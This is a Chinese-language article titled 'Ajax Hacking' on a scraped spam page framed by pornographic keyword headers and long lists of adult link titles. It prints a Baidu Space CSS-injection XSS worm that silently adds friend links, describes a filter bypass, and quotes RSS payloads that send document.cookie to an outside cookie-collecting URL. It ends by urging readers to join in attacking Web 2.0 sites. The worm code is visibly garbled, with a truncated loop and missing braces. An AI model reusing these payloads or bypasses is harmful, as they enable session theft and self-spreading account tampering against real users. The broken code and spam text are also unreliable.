校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃

主頁 > 知識庫 > Ajax Hacking

Ajax Hacking

熱門標簽:上海浦東騰訊地圖標注位置 海南銀行智能外呼系統商家 澳大利亞城市地圖標注 遼寧銀行智能外呼系統 電銷機器人違法了嗎 辰溪地圖標注 許昌智能電銷機器人公司 姜堰電銷機器人 遼寧正規電銷機器人
由此Ajax攻擊可見一斑,然而這還僅僅是個開始。7月份百度開通了百度空間,雖然沒有指明是應用web2.0技術,但從web2.0象征的測試版(beta)和頁面模版架構等等,你可以看出它事實上已經應用了Ajax技術。而在空間開通不到半個月,相應的攻擊方式又產生了,這個攻擊應該又算是一個蠕蟲吧。它利用百度提交的自定義css(Cascading Stylesheet,層疊樣式表單)中對插入的javascript過濾不嚴格,而使攻擊者可以寫入惡意代碼進行了xss(Cross Site Scripting)跨站。從而使瀏覽該空間的百度通行證用戶在不知覺的情況下將該站點加入自己的友情連接中。最原始代碼標本如下:
復制代碼 代碼如下:
#header{height:89px;background:url("javascript:document.body.onload = function(){ //- - 在css的樣式標簽中插入javascript代碼 
var req = null; 
if(window.XMLHttpRequest) req = new XMLHttpRequest(); //- - 這句懂ajax的都知道,是它的核心XMLHttpRequest,而下面當然是必不可少的判斷是否IE的語句了。 
else if(window.ActiveXObject){ 
var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP'); 
for(var i=0;i try{req.overrideMimeType('text/xml')}catch(e){} 

req.open('get','.',false); 
req.send(); 
var s=req.responseText; 
p=s.indexOf('passport.baidu.com/?logout'); 
if(p>0) 

p=s.indexOf(''); 
if(p>0) 

p=s.indexOf('/',p); 
p2=s.indexOf(String.fromCharCode(34),p); 
var user=s.substring(p+1,p2); 
var name='Here is a bad site'; 
var link='目標網址'; 
var desc='This link was added by an XSS script'; 
var url='/'+user+'/commit'; 
var data='ct=6cm=1spRef='+escape('http://hi.baidu.com/#39;+user)+'%2Fmodify%2Fbuddylink%2F0spBuddyName='+escape(name)+'spBuddyURL='+escape(link)+'spBuddyIntro='+escape(desc); //- - 這句是整個蠕蟲的執行語句,也是Ajax的數據異步調用語句。 
req.open('post',url,false); 
req.send(data); 
alert('A friend link has been added to your space at http://hi.baidu.com/#39; +user); 


else{alert('You are not a logged Baidu user.');} //- - 由于是標本語句,所以這里有對是否登陸的判斷,但實際攻擊中當然不會有。 
}"); 
當時百度在第一時間內對此蠕蟲作出了反映——過濾提交表單中的javascript,當然這也使正常用戶無法再在blog中貼入Flash動畫。但后來的變種使得境況變得更糟糕,因為有人發現百度僅僅是過濾了CSS文本中的譬如"javascript"和"expression"這樣的字符串。也就是說如果把”javascript”分成兩行來寫,就可以繞過百度的過濾但同時又被IE執行。而這時變種的蠕蟲也隨之產生,其造成的結果是在用戶的css中加入如下代碼:
#header {……
很簡單的一句吧,這幾乎把該蠕蟲提升到了病毒性質,因為用戶本身無法到達css修改頁面來修復他的css代碼。事實上直到寫這篇文章時,百度空間尚沒有對一些另類的插入惡意代碼方式進行有效地過濾和封鎖。
如果認為他們所造成的影響都是局域的,那么我不得不帶領大家來看一些影響比較廣泛的最具有web2.0性質的——Rss(Really Simple Syndication)攻擊。這是我從zdnet.com的Joris Evers的一篇名為“Blog feeds may carry security risk ”了解到的,大體意思是說由于目前幾乎所有的不管是在線的還是離線的Rss閱讀器都沒有有效地對攙雜在Rss中的腳本進行過濾,導致攻擊者可以向Rss中寫入惡意的javascript代碼,最終導致xss跨站,獲取用戶信息或其他。包括著名的Bloglines, RSS Reader, RSS Owl, Feed Demon, Sharp Reader都在攻擊范圍之內。這是去年yahoo rss xss代碼:

javascript:%20document.location='http://www.target.com/cookie.cgi?#39;%20+document cookie;
Should Steal Your Cookie.
Tue, 20 Sep 2005 23:55:18 EDT

javascript:%20alert(document.cookie);
Should Steal Your Cookie.
Tue, 20 Sep 2005 23:55:18 EDT

事實上,最早的web2.0攻擊出現在去年的myspace.上,有人在MySpace交友網站上寫了一段JavaScript蠕蟲代碼,利用Ajax方法讓無數的用戶在不知情的情況下把他加入了好友名單,同時在他們的個人簡介最后自動加上了“samy is my hero”的字樣。此蠕蟲被稱為世界上第一個“web2.0蠕蟲”。而從上文的對email、css、rss攻擊進行的描述中你也可以看出目前對 web2.0的攻擊利用亦是多方面的。但并不單單指跨站,網上有一篇《Hacking Ajax》的文章,其中有一句話被加了黑體,“By corrupting one of the dozens of data exchanges Ajax handles while loading a Web page, a hacker can take over control of the PC”,也就是說適當情況下,利用Ajax攻擊并獲得個人電腦管理權限亦是可能的。
由于目前系統對補丁的發布采取的都是時時更新功能,想通過溢出獲得shell已經很難了,除非是0day的系統漏洞;而sql注入在網絡也肆虐了幾年,亦有了行之有效的防范方法;并且由于Python和Ruby語言的興起,新的web2.0服務正在產生并有取代現有web結構趨勢,譬如Plone。但不可改變的是web瀏覽器對xhtml和javascript的解釋,只要我們始終有改變javascript的可能性,我們就永遠有提升自己權限的可能……
那么對于日趨龐大的web2.0大軍,你是否有興趣從中分一杯羹呢? 

標簽:崇左 西藏 撫州 銅川 威海 深圳 伊春 晉城

巨人網絡通訊聲明:本文標題《Ajax Hacking》,本文關鍵詞  Ajax,Hacking,Ajax,Hacking,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Ajax Hacking》相關的同類信息!
  • 本頁收集關于Ajax Hacking的相關信息資訊供網民參考!
  • 推薦文章
    校园春色亚洲色图_亚洲视频分类_中文字幕精品一区二区精品_麻豆一区区三区四区产品精品蜜桃
    久久久国产精品午夜一区ai换脸| 男男成人高潮片免费网站| 亚洲国产精品成人综合| 精品区一区二区| 欧美tickle裸体挠脚心vk| 日韩一级二级三级| 欧美sm极限捆绑bd| 久久这里只有精品首页| 久久精品一区二区三区av| 久久蜜桃av一区二区天堂| 久久精品日产第一区二区三区高清版| 久久久久久毛片| 日本一区二区视频在线| 国产精品国产三级国产普通话三级| 国产精品护士白丝一区av| 亚洲欧美激情小说另类| 亚洲黄色小说网站| 日韩成人伦理电影在线观看| 全国精品久久少妇| 国产成人亚洲综合a∨猫咪| 丁香婷婷综合色啪| 色婷婷综合视频在线观看| 欧美丰满嫩嫩电影| 精品成人佐山爱一区二区| 欧美激情一区在线| 亚洲最快最全在线视频| 日韩在线一区二区三区| 国产曰批免费观看久久久| av午夜精品一区二区三区| 欧美日韩一卡二卡三卡 | 欧美va亚洲va在线观看蝴蝶网| 欧美电影免费提供在线观看| 国产喷白浆一区二区三区| 日韩毛片高清在线播放| 三级亚洲高清视频| 国产大陆精品国产| 欧美日韩一区二区在线视频| 日韩欧美中文字幕一区| 国产精品美女视频| 首页国产欧美日韩丝袜| 国产剧情一区二区三区| 91国产福利在线| 精品欧美一区二区三区精品久久| 中文字幕欧美日韩一区| 亚洲不卡在线观看| 高清成人在线观看| 欧美精品 国产精品| 国产欧美一区二区三区网站| 亚洲电影在线免费观看| 国产·精品毛片| 欧美久久久久久久久| 亚洲国产岛国毛片在线| 日本女人一区二区三区| 91同城在线观看| 精品美女被调教视频大全网站| 亚洲日本乱码在线观看| 久久精品国产一区二区| 91福利国产精品| 久久久99久久| 奇米影视7777精品一区二区| 91麻豆精品在线观看| 久久综合九色欧美综合狠狠| 亚洲已满18点击进入久久| 成人午夜av电影| 日韩美女天天操| 亚洲一区在线视频| 岛国一区二区三区| 欧美v国产在线一区二区三区| 一个色综合av| www.亚洲免费av| 国产偷v国产偷v亚洲高清| 日韩高清一区在线| 日本精品一区二区三区高清| 欧美韩国日本不卡| 国产在线麻豆精品观看| 欧美一区二区在线看| 亚洲综合在线五月| av一二三不卡影片| 久久众筹精品私拍模特| 免费成人你懂的| 制服.丝袜.亚洲.另类.中文| 一区二区日韩电影| 一本久道中文字幕精品亚洲嫩| 国产拍欧美日韩视频二区| 久久er99热精品一区二区| 欧美人狂配大交3d怪物一区| 亚洲一区二区欧美日韩| 91在线播放网址| 中文无字幕一区二区三区 | 欧美一卡二卡三卡四卡| 亚洲国产aⅴ成人精品无吗| 91色在线porny| 一区在线播放视频| 成人免费毛片片v| 欧美国产欧美亚州国产日韩mv天天看完整| 九色|91porny| 欧美精品一区二区三区蜜臀| 老鸭窝一区二区久久精品| 欧美一级欧美三级在线观看| 日韩黄色小视频| 欧美一区二区三区啪啪| 美女脱光内衣内裤视频久久影院| 911国产精品| 男男成人高潮片免费网站| 欧美一区二区视频在线观看| 日韩不卡一二三区| 日韩欧美在线1卡| 久久丁香综合五月国产三级网站| 欧美不卡激情三级在线观看| 极品少妇xxxx精品少妇偷拍| 国产欧美一区二区三区沐欲| 粉嫩蜜臀av国产精品网站| 中文字幕中文字幕中文字幕亚洲无线 | 九九在线精品视频| 国产午夜亚洲精品理论片色戒| 福利电影一区二区| 亚洲免费观看在线视频| 欧美日韩一区二区在线观看 | 成人午夜电影网站| 亚洲欧美日韩系列| 欧美在线不卡一区| 蜜臀a∨国产成人精品| 久久久精品蜜桃| 成人三级伦理片| 亚洲自拍欧美精品| 欧美一区日韩一区| 国产成人99久久亚洲综合精品| 亚洲日本va在线观看| 欧美日韩视频专区在线播放| 六月婷婷色综合| 国产欧美精品一区aⅴ影院| 97久久超碰国产精品| 午夜精品久久久久久久蜜桃app| 精品美女被调教视频大全网站| 成人精品国产免费网站| 午夜欧美在线一二页| 久久美女高清视频| 欧美最猛黑人xxxxx猛交| 日韩av中文字幕一区二区| 国产色综合久久| 欧美色图在线观看| 国产一区二区精品久久| 亚洲黄色免费网站| 亚洲精品在线免费观看视频| 99热99精品| 美国精品在线观看| 亚洲少妇中出一区| 欧美一区二区三区在线| 成人深夜福利app| 日韩 欧美一区二区三区| 不卡的电视剧免费网站有什么| 国产精品久久久久aaaa樱花 | 中文字幕一区二区三区在线不卡| 欧美日韩精品是欧美日韩精品| 国产在线精品一区二区夜色| 亚洲乱码精品一二三四区日韩在线| 欧美成人性福生活免费看| 91美女片黄在线观看91美女| 久久机这里只有精品| 亚洲精品高清在线观看| 久久久夜色精品亚洲| 欧美视频一区二区三区在线观看| 国产麻豆精品95视频| 香蕉久久一区二区不卡无毒影院 | 中文字幕一区二区三区精华液| 欧美精品丝袜中出| 99久久久国产精品免费蜜臀| 另类小说综合欧美亚洲| 亚洲成人在线网站| 国产精品热久久久久夜色精品三区| 欧美精品粉嫩高潮一区二区| 色综合中文字幕| 丁香天五香天堂综合| 国内精品视频一区二区三区八戒| 五月天婷婷综合| 一区二区三区四区精品在线视频| 国产女人水真多18毛片18精品视频| 91麻豆精品国产91久久久久| 欧美综合天天夜夜久久| 成人福利视频在线| 国产精品一区二区久久精品爱涩| 视频一区二区三区中文字幕| 亚洲午夜久久久久久久久电影网| 综合久久久久久| 国产精品嫩草99a| 久久久99精品免费观看不卡| 欧美大片在线观看一区| 欧美精品三级日韩久久| 欧美网站一区二区| 一本色道亚洲精品aⅴ| 成人国产亚洲欧美成人综合网 | 一本一道波多野结衣一区二区| 国产不卡高清在线观看视频| 国产在线精品免费av| 老司机精品视频线观看86| 美女视频网站黄色亚洲| 日韩福利视频导航| 日日欢夜夜爽一区| 亚洲福利视频一区| 亚洲高清免费在线|